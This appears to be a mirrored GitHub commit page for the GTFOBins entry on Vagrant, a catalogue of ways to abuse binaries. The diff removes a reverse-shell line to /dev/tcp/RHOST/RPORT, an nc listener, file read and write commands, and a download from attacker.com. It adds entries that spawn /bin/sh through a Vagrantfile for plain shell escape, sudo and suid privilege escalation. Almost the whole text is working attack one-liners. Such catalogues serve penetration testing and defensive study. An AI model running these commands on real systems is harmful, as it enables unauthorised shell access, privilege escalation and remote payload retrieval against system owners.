mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
Code Issues

Simplify vagrant

Browse Source
This commit is contained in:
Andrea Cardaci 2023-04-13 08:34:09 +02:00 committed by GitHub
parent e05b154647
commit f121dff1cc
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
_gtfobins/vagrant.md
View File

@ -1,30 +1,20 @@
---
description: |
Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
More Info at https://gtfobins.github.io/gtfobins/ruby/
description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
functions:
shell:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
-
- code: |
cd $(mktemp -d)
echo 'exec "/bin/sh"' > Vagrantfile
vagrant up
sudo:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
reverse-shell:
- description: |
Run `nc -lvnp RPORT` on the attacker box.
Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
code: |
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
file-write:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
file-read:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
- code: |
cd $(mktemp -d)
echo 'exec "/bin/sh"' > Vagrantfile
vagrant up
suid:
- code: |
cd $(mktemp -d)
echo 'exec "/bin/sh -p"' > Vagrantfile
vagrant up
---